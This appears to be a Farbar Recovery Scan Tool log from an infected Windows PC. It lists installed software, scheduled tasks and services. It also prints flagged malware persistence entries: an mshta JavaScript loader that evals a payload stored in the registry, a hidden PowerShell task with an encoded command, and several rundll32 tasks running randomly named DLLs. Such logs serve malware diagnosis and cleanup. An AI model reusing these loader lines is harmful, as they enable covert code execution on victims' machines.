Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version: - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft Xbox One Controller for Windows (HKLM\...\{DC2CB48C-FD96-48EB-A36A-7D995BB587EB}) (Version: 1.0.2 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 57.0.4 (x64 en-US) (HKLM\...\Mozilla Firefox 57.0.4 (x64 en-US)) (Version: 57.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 57.0.4.6577 - Mozilla)
MSI Afterburner 4.0.0 (HKLM-x32\...\Afterburner) (Version: 4.0.0 - MSI Co., LTD)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Mumble 1.2.10 (HKLM-x32\...\{BA360AD9-B847-48EF-A182-6345703284E9}) (Version: 1.2.10 - Thorvald Natvig)
Nidhogg (HKLM-x32\...\TmlkaG9nZw==_is1) (Version: 1 - )
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.9 - Notepad++ Team)
NVIDIA 3D Vision Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 391.01 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.12.0.84 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.12.0.84 - NVIDIA Corporation)
NVIDIA Graphics Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 391.01 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Orbital Gear v1.3.3 (HKLM-x32\...\Orbital Gear_is1) (Version: 1.3.3 - OUTLAWS)
Origin (HKLM-x32\...\Origin) (Version: 9.11.5.17432 - Electronic Arts, Inc.)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
paint.net (HKLM\...\{F10AAD91-58DF-44EC-A647-810197141667}) (Version: 4.0.19 - dotPDN LLC)
Patch v4.17b Update (HKLM-x32\...\{THEGUILDREN-0010-2010-300520102330}_is1) (Version: - RUNEFORGE Games Studios)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
pyfa version 1.5.1 (Oceanus 1.0) (HKLM-x32\...\{3DA39096-C08D-49CD-90E0-1D177F32C8AA}_is1) (Version: 1.5.1 (Oceanus 1.0) - pyfa)
qBittorrent 3.3.7 (HKLM-x32\...\qBittorrent) (Version: 3.3.7 - The qBittorrent project)
R for Windows 3.2.2 (HKLM\...\R for Windows 3.2.2_is1) (Version: 3.2.2 - R Core Team)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 2.20.15.1104 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.67.1226.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6954 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Redout (HKLM-x32\...\Redout_is1) (Version: - )
Resident Evil 6 (HKLM-x32\...\Resident Evil 6_R.G. Mechanics_is1) (Version: - R.G. Mechanics, spider91)
Resident Evil 7 Biohazard (HKLM-x32\...\{1ECBF8F3-7079-44CA-AD32-B2AECBCF636F}_is1) (Version: - Capcom)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.0.6.1 - Rockstar Games)
RStudio (HKLM-x32\...\RStudio) (Version: 1.0.136 - RStudio)
RUSH Mechanical Keyboard (HKLM-x32\...\{A852EA21-FD88-4840-AE94-3243C9895325}}_is1) (Version: - )
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.25.0 - SAMSUNG Electronics Co., Ltd.)
Satellite Reign (HKLM-x32\...\1428054996_is1) (Version: 2.7.0.11 - GOG.com)
ScummVM 1.8.1 (HKLM-x32\...\ScummVM_is1) (Version: - The ScummVM Team)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Shadow Tactics - Blades of the Shogun (HKLM-x32\...\1601442230_is1) (Version: 2.0.0.3 - GOG.com)
Shift Happens version 1.0 (HKLM-x32\...\Shift Happens_is1) (Version: 1.0 - Klonk Games Deck13 FFF Bayern)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{BD90BC1C-115D-47E1-B85C-07AE182C3AB8}) (Version: 7.0.27.13 - Mad Catz)
Soldat 1.6.8 (HKLM-x32\...\Soldat_is1) (Version: 1.6.8 - Michal Marcinkowski)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.6.46 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Stronghold Crusader Extreme HD (HKLM-x32\...\GOGPACKSTRONGHOLDCRUSADERHD_is1) (Version: 2.2.0.8 - GOG.com)
StrongholdCrusader (HKLM\...\{5a56ddf5-f2fd-4a53-b852-909002f9df30}.sdb) (Version: - )
SumatraPDF (HKLM-x32\...\SumatraPDF) (Version: 2.4 - Krzysztof Kowalczyk)
Sunless Sea (HKLM-x32\...\1421064427_is1) (Version: 2.4.0.5 - GOG.com)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.36244 - TeamViewer)
The Battle for Middle-earth II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version: - )
The Guild 2 - Pirates of the European Seas (HKLM-x32\...\GOGPACKTHEGUILD2PIRATES_is1) (Version: 2.0.0.4 - GOG.com)
The Guild 2 - Renaissance (HKLM-x32\...\1207664873_is1) (Version: 2.0.0.1 - GOG.com)
The Last Door - Collector's Edition (HKLM-x32\...\GOGPACKTHELASTDOOR_is1) (Version: 2.0.0.3 - GOG.com)
The Red Alert (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\The Red Alert) (Version: 1.2.0.0 - CNC Labs)
The Settlers 3 - Ultimate Collection (HKLM-x32\...\GOGPACKSETTLERS3_is1) (Version: 2.0.0.19 - GOG.com)
The Talos Principle (HKLM-x32\...\The Talos Principle_is1) (Version: - )
The Walking Dead: Michonne (HKLM-x32\...\The Walking Dead: Michonne_is1) (Version: - )
The Witness (HKLM\...\dGhld2l0bmVzcw_is1) (Version: 1 - )
The Wolf Among Us (HKLM-x32\...\The Wolf Among Us_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Tom Clancy's Rainbow Six Vegas 2 (HKLM-x32\...\{FD416706-875C-4B0B-A23A-9E740DAE029E}) (Version: 1.03 - Ubisoft)
Torchlight 2 Rapid Respec (HKLM-x32\...\Torchlight 2 Rapid Respec) (Version: 2.04 - Chthon)
Torchlight II © Runic Games version 1 (HKLM-x32\...\Torchlight II © Runic Games_is1) (Version: 1 - )
ToxTrac (HKLM-x32\...\{3149DAFE-23F5-4907-BC83-9C4AA1661BD9}) (Version: 2.60 - Umeå University)
tpsDig2w64 version 2.19 (HKLM\...\tpsDig2w64_is1) (Version: 2.19 - )
Tribes Ascend (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF010}) (Version: 1.1.2860.0 - Hi-Rez Studios)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.8.4 - Tunngle.net GmbH)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Unity Web Player (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\UnityWebPlayer) (Version: - Unity Technologies ApS)
Unravel™ (HKLM-x32\...\{5105E605-9EE7-4050-9CC0-005093BBF89A}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Unreal Tournament GOTY (HKLM-x32\...\GOGPACKUT_is1) (Version: 2.0.0.5 - GOG.com)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version: - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 25.0 - Ubisoft)
Walking Dead 2 (HKLM-x32\...\Walking Dead 2_is1) (Version: - Audioslave)
VASSAL (3.2.15) (HKLM\...\VASSAL (3.2.15)) (Version: 3.2.15 - vassalengine.org)
Who's Your Daddy Alpha version 0.1.1 (HKLM-x32\...\{1BE05F6C-F9EB-491B-AE8A-A4B77F60DF4D}_is1) (Version: 0.1.1 - Joe Williams)
Vikings: Wolves of Midgard (HKLM-x32\...\Vikings: Wolves of Midgard_is1) (Version: - )
Winamp (HKLM-x32\...\Winamp) (Version: 5.666 - Nullsoft, Inc)
WinDirStat 1.1.2 (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\WinDirStat) (Version: - )
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
Virtual Audio Cable 4.13 (HKLM\...\Virtual Audio Cable 4.13) (Version: - )
Vivaldi (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Vivaldi) (Version: 1.13.1008.40 - Vivaldi)
VoiceAttack (HKLM-x32\...\{FBABC026-02F7-46D5-A0F9-3D355D3C3133}) (Version: 1.5.7 - VoiceAttack.com)
Wolfenstein The Old Blood (HKLM-x32\...\Wolfenstein The Old Blood_is1) (Version: - )
Wolfenstein: The New Order (HKLM-x32\...\V29sZmVuc3RlaW5UaGVOZXdPcmRlcg==_is1) (Version: 1 - )
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
ZTE Handset USB Driver (HKLM\...\{01D42BF0-ED08-463f-8A28-99EB6FEE962B}) (Version: - ZTE Corporation)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
HKU\.DEFAULT\Software\Classes\3d878: "C:\Windows\system32\mshta.exe" "javascript:Qy2pqhd8="cGnOVdL4";bu1=new ActiveXObject("WScript.Shell");s7Wb7IoYn="JcVXE";HAb4P=bu1.RegRead("HKCU\\software\\dovquskjdo\\thbfcp");Z9MeKir="h8c665I";eval(HAb4P);d0jSmzjo4="b4pkxh7";" <==== ATTENTION
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2014-05-12] ()
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-02-23] (NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0BBD42E9-A2FA-4576-9890-D0C1FED0E844} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2018-01-10] (NVIDIA Corporation)
Task: {0BFE3D12-EE22-42E2-9D99-08E5014A0294} - System32\Tasks\ASUS\i-Setup225905 => C:\Windows\Intel-Chipset_Win7_8_VER9401017\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.)
Task: {0FEC692B-1674-436D-BBF8-596CCFF7468D} - System32\Tasks\{8D7BD5CC-F762-4C88-83D1-6E0E6114373E} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.7.0.103/nl/abandoninstall?page=tsPlugin
Task: {13AA3023-6A6A-479F-A0A0-0E803510CA59} - System32\Tasks\wXkHuguozQzssiw2 => rundll32 "C:\Program Files (x86)\GveoMZenU\AmeWky.dll",#1
Task: {2816C76A-9AA6-4188-ACEB-4BE0C0DD0E90} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {2EE04458-0CAB-4DFB-ABB0-601043DBF441} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-01-10] (NVIDIA Corporation)
Task: {3091ED5C-5B9D-4A68-A3AC-9A27E05EA3A8} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2018-01-10] (NVIDIA Corporation)
Task: {3C201A85-C7D6-4A1C-AC4B-352926B536E5} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2018-01-10] (NVIDIA Corporation)
Task: {57D3EFB8-7DC5-4C47-933B-B64DA7804C52} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {584F7B10-0278-459B-8253-A225517D91AF} - System32\Tasks\OHurYzwpfZsLsh => rundll32 "C:\Program Files (x86)\pBsTWTvYOXtU2\oAhmxetWBkkyl.dll",#1
Task: {586E3E7E-04DD-4F50-BB9C-C8E54BFFCD13} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-02-06] (Adobe Systems Incorporated)
Task: {5ACD0E5E-1851-4D78-A828-E885A7A38D97} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAIAA7ACAAOwA7ADsAOwAgADsAIAAgACAAIAAgADsAIAA7ACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkA (the data entry has 10064 more characters). <==== ATTENTION
Task: {79DFCC47-8C8D-4D07-8F11-E20BECC26092} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {95D233E6-C06E-4569-BE35-EE1FF61B18E7} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {AB73D322-7316-4971-BE0D-4CA5E8D9C1DC} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-05-21] ()
Task: {AFE18389-F758-4DAC-8D9B-E3B57C98E691} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {B22B3AE9-EA76-4331-A232-E8A08C28BF26} - System32\Tasks\VTsFYYvpoVEusFPoU2 => rundll32 "C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR\JSkkqWG.dll",#1
Task: {BB369166-0B23-49CC-9856-AE0991891F5A} - System32\Tasks\oWotDXBujaUxMpNAqmS2 => rundll32 "C:\Program Files (x86)\zKUGIuVeiGvyC\fuIpEbs.dll",#1
Task: {C37FC464-71FD-406A-9BB1-351B799E500C} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => C:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {D7E118E8-48A4-4305-9518-2E81878767D6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {DF64ABAB-F7B0-43E8-9B1E-22A47ED36357} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {F25664B5-F21D-4C23-B584-2947A5D13292} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {FC3DA8B1-316E-4796-A3FC-79A33A78BC4C} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-02-01] ()
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2014-05-12 10:49 - 2014-05-12 10:49 - 000222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Windows:E34B0F9ED3964806 [50]
AlternateDataStreams: C:\Users\Martin:Heroes & Generals [38]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\europacasino.com -> www.europacasino.com
IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\skype.com -> hxxps://apps.skype.com
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2014-12-06 18:54 - 2014-12-06 18:54 - 000000000 _____ C:\Windows\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Martin\AppData\Roaming\DisplayFusion\Wallpaper_1
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
==================== MSCONFIG/TASK MANAGER disabled items ==
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AeLookupSvc => 3
MSCONFIG\Services: ALG => 3
MSCONFIG\Services: AppIDSvc => 3
MSCONFIG\Services: AppMgmt => 3
MSCONFIG\Services: aspnet_state => 3
MSCONFIG\Services: AudioEndpointBuilder => 2
MSCONFIG\Services: AudioSrv => 2
MSCONFIG\Services: AxInstSV => 3
MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BEService => 3
MSCONFIG\Services: BFE => 2
MSCONFIG\Services: BITS => 2
MSCONFIG\Services: Browser => 3
MSCONFIG\Services: bthserv => 3
MSCONFIG\Services: CertPropSvc => 3
MSCONFIG\Services: clr_optimization_v4.0.30319_32 => 2
MSCONFIG\Services: clr_optimization_v4.0.30319_64 => 2
MSCONFIG\Services: COMSysApp => 3
MSCONFIG\Services: CryptSvc => 2
MSCONFIG\Services: CscService => 2
MSCONFIG\Services: defragsvc => 3
MSCONFIG\Services: Dhcp => 2
MSCONFIG\Services: DiagTrack => 2
MSCONFIG\Services: DisplayFusionService => 2
MSCONFIG\Services: Dnscache => 2
MSCONFIG\Services: dot3svc => 3
MSCONFIG\Services: DPS => 2
MSCONFIG\Services: EapHost => 3
MSCONFIG\Services: EFS => 3
MSCONFIG\Services: eventlog => 2
MSCONFIG\Services: EventSystem => 2
MSCONFIG\Services: Fax => 3
MSCONFIG\Services: fdPHost => 3
MSCONFIG\Services: FDResPub => 3
MSCONFIG\Services: FlexNet Licensing Service => 3
MSCONFIG\Services: FontCache => 2
MSCONFIG\Services: FontCache3.0.0.0 => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Hamachi2Svc => 2
MSCONFIG\Services: hidserv => 3
MSCONFIG\Services: HiPatchService => 2
MSCONFIG\Services: hkmsvc => 3
MSCONFIG\Services: HnGSteamService => 3
MSCONFIG\Services: HomeGroupListener => 3
MSCONFIG\Services: HomeGroupProvider => 3
MSCONFIG\Services: idsvc => 3
MSCONFIG\Services: IEEtwCollectorService => 3
MSCONFIG\Services: IKEEXT => 2
